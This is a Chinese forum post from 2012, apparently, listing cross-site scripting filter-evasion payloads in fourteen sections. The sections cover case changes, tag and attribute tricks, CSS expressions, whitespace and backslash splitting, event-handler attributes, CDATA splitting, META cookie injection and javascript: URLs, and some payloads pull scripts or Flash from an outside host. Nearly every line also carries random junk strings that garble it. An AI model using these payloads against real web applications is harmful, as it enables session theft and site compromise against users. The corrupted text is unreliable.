1. 改变字符大小写
n! b/ ?% t- c, U$ X7 X" p3 g) g7 p9 ]
/ ]% a3 I9 \8 l& ^ ( Z2 @. _ ^2 k% v5 E8 i
: Z5 E! H* Q1 L5 t7 ] <sCript>alert(‘d’)</scRipT>
7 r, X( F# Z1 i2 H: ^
8 i, n' z. l. w& W; R, N9 d2. 利用多加一些其它字符来规避Regular Expression的检查, |8 y3 Z' n1 B( H3 S+ Y
\) W1 m) V2 B3 Q1 S
<<script>alert(‘c’)//<</script>
0 r) R1 F6 a; G
3 Z. V- S' R8 @0 W8 {) M <SCRIPT a=">" SRC="t.js"></SCRIPT>: u$ D3 d/ J! y5 u. \( _
& Q; A y2 D3 W; [
<SCRIPT =">" SRC="t.js"></SCRIPT>
8 \8 v I; I% B
* |* g; u# {) T4 p <SCRIPT a=">" ” SRC="t.js"></SCRIPT>2 B# v6 G# {2 B: `. W
( C! r! e& b* r! |) P5 y <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
# v( l! [5 F- R( g$ H; W5 Y/ q! Z0 A4 v( y! R
<SCRIPT a=`>` SRC="t.js"></SCRIPT>2 f* V0 x# M( C: U' {) |4 f
4 m& ]* O# w8 [7 g! Q$ P( n <SCRIPT a=">’>" SRC="t.js"></SCRIPT>( F+ `6 A2 {; N- B
! ^, T5 d. Q+ c
3. 以其它扩展名取代.js
0 Z0 W8 g' d+ {/ z- h$ i1 j4 S* _$ Y& j6 {2 k
<script src="bad.jpg"></script>
2 y- r6 I% \8 m( |! F# E% O; g3 T3 ~7 l5 d
4. 将Javascript写在CSS档里
- n$ Q# d4 |; ~1 W S# h6 A1 X
7 D/ G% P r/ v: s1 ?- ] <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
) a8 g: m0 u2 @3 S6 U* Y. _% d5 O4 C! Q/ U2 K) q# V. V6 o
example:
4 b7 Q4 F% I, {: a
/ i R& v& h. n- j& q l6 {' @ body {8 o: i7 u9 W- N# y( t. [' i
9 Q' G& W- ?. Z$ x0 |
background-image: url(‘javascript:alert("XSS");’)
* W' W! f+ V8 O3 a$ R/ x
+ o, L. S3 ?1 x- s& e1 G }
$ e* e9 J/ f" z5 @" @$ j8 U4 v4 ?4 S, u9 j! V$ H2 N5 z
5. 在script的tag里加入一些其它字符+ x% T3 ~9 G+ _6 j2 n. x
, w9 i5 l5 G% u1 f" o* V
<SCRIPT/SRC="t.js"></SCRIPT>
" P& X3 h0 L9 j V; i/ ~
/ ^6 k f( C5 L <SCRIPT/anyword SRC="t.js"></SCRIPT>
# Q) Q4 D; k: c) U( S- H- k! D7 r* B# k4 K
6. 使用tab或是new line来规避
4 U4 U' M; l/ s9 ^ R7 a5 ~+ _
9 |1 }+ M$ `" l! ]& ~) k: B: T1 r <img src="jav ascr ipt:alert(‘XSS3′)">
; z' G/ v/ a* f/ @0 i/ V2 K* F" B2 y7 {
, M9 l" b1 r+ w* i <img src="jav ascr ipt:alert(‘XSS3′)">' P+ v4 d2 t( k
. c& K0 U, M i# i4 g
<IMG SRC="jav ascript:alert(‘XSS’);">/ a, |: b) f/ H2 D/ C
0 y" F+ `" L8 P7 w, F* i -> tag
0 s$ s8 B9 K6 ?% B# U2 R' k/ }6 y4 S4 v; [' {: B
-> new line( I. ^' H9 V& A5 J; S/ [6 ~
p7 d) g/ w6 K( y4 `
7. 使用"\"来规避6 X- o3 `3 P) C* S
% M7 N% D0 ^6 I9 m0 l0 V <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>( Q. P/ a `: U. X ^
# D0 c% q$ q/ ~% ^, d& ~2 K
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
9 [, \ p" {/ J1 k2 w2 d: Q r2 f4 a$ _% ?7 T" s
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">; }$ _6 Y; N% a8 u; f
* P, e+ k, C7 Q3 L- U
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">! o3 V( n. v0 d/ Q# ~ s
. U+ ?8 W( |( i
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>4 W8 @ r6 A5 D/ A3 `4 O) H# g1 t
! g' N7 b+ P9 W/ Q* Q8. 使用Hex encode来规避(也可能会把";"拿掉)) y% \' {* @6 C$ R: F3 { H" {8 v
% w& s5 z3 ~% Y7 I" I <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">& J( d# q4 `, F9 O: E# i- s1 C
, |" E5 j& u. [( S7 C4 `; c. E 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">' M' v% b. z5 m
- D& P! D; K0 P: E4 ^' k
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">4 o; a0 r% M) Z9 n* g
! n- `6 f1 k: ^9 r0 m 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">' k8 l9 q4 A% V: l
( Y) i* M4 N1 M. [2 F0 x% p9. script in HTML tag
& x; U9 M4 E. K% L4 z9 ^0 Q
. M5 F3 H9 h2 W; v, i) E <body onload=」alert(‘onload’)」>) h6 }$ o# r0 k- ], @3 w' g& ~5 L
4 v2 O4 Z0 j1 \* [# a( e
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload/ ~1 c1 V: [- I1 V8 t$ c5 M' i
6 f% ]& z( Z) t) P10. 在swf里含有xss的code+ F. m! } v* |" f8 m
! L# [- ]# x0 }/ g9 [
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>3 p% t% P0 q1 M/ G4 }
* l" U. c( ?7 M* K% v. R7 W g" f
11. 利用CDATA将xss的code拆开,再组合起来。/ e8 G3 n1 Z5 P* U
' @$ L% l( W7 @; | <XML ID=I><X><C>
% P$ j. @; c1 f- O$ V. s$ L0 H/ c0 M. \. L w. c C- j% t& [. h' U* w( V5 C9 P
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
7 g$ k; l% g" ]. O$ a
, q! n8 u( i6 e6 @4 F& i </C></X>
+ a* g4 f& g0 x% q7 m4 F9 S9 b# S I& s7 M- J3 r
</xml>
5 o" O1 ?3 I: l( J4 O: G [0 ]" f" Z2 w0 g
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
5 Y) @: G. Y$ M5 o8 H
, z( s. |' v+ X6 P <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>7 S$ m+ ?% R5 a- b# A' s
' S0 M7 z" a' k5 {6 t! J <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>/ q& K( f/ D) o8 s5 ~
3 ?8 X9 W3 T% A- t& h% L, ]12. 利用HTML+TIME。
1 L3 R3 q& q/ Z+ L/ x% T
( Q: l3 j7 ~2 K* p <HTML><BODY>
( R5 v% n6 G# r: X- U5 W9 F/ e# x: S& l% I; y
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
/ F2 D' d, n- k9 u8 o2 I+ t# v5 U9 A0 y+ J1 V
<?import namespace="t" implementation="#default#time2">
! p6 m) Z8 e! g
2 K, W# c; D7 G1 s& d <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">! V; r6 Z1 {; U4 j
# L5 S5 m! A- X2 p- }/ O* _5 i
</BODY></HTML>/ K) \- j, l7 G2 n
+ M. v7 Z, Y1 s5 h7 ^0 K% ], G13. 透过META写入Cookie。
* ^2 x: V; C0 Q. U- K" Y b2 z7 } J# Y+ E
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">8 E2 C/ q$ p" ~9 [1 v
5 w( ?- v9 ~2 K/ d. } @5 Q% V2 i
14. javascript in src , href , url
( b8 J/ D u8 J( o* o+ H# Q0 ^6 S* `6 c4 _7 b# k* q
<IFRAME SRC=javascript:alert(’13′)></IFRAME>$ D# _) U0 l6 D4 K2 C! k! b) ^
* k1 w8 S0 P% e; v" v <img src="javascript:alert(‘XSS3′)">1 Y5 c' ~% z! n$ M, Y
- j+ f1 J, X5 n0 {2 E* f, ~
<IMG DYNSRC="javascript:alert(‘XSS20′)">2 g: N; H# l9 M: j% _& @
0 N) L9 A0 @- q$ _ <IMG LOWSRC="javascript:alert(‘XSS21′)">
# ~! K( P. J4 p% v2 D' ?7 P) K$ p. u
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">+ `) y( G7 S) L3 Q4 D/ a( O. J! _
a, l: ~6 S5 ~* ?+ ^
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
! E) p; b# \" {7 j0 i0 W* k( g( h. V3 W
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
( y" } M( Y! \- X/ W+ w! r/ u) t4 ?" U8 _ u5 H
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">( G9 A5 ^* E) n
- q$ R" l! s6 Y5 d& n1 V <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
8 _' ~5 v) {7 F/ u' c( b7 N! i6 D! p n; ]
</STYLE><A CLASS=XSS></A>, A! s7 K0 Q( X- |) S
: _. F6 o$ Y7 M) o <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
# ?% b. X4 f. B0 A: j; W
% k8 G# I8 C! J m" N |
发表于 2012-12-31 09:59:28
收藏
支持
反对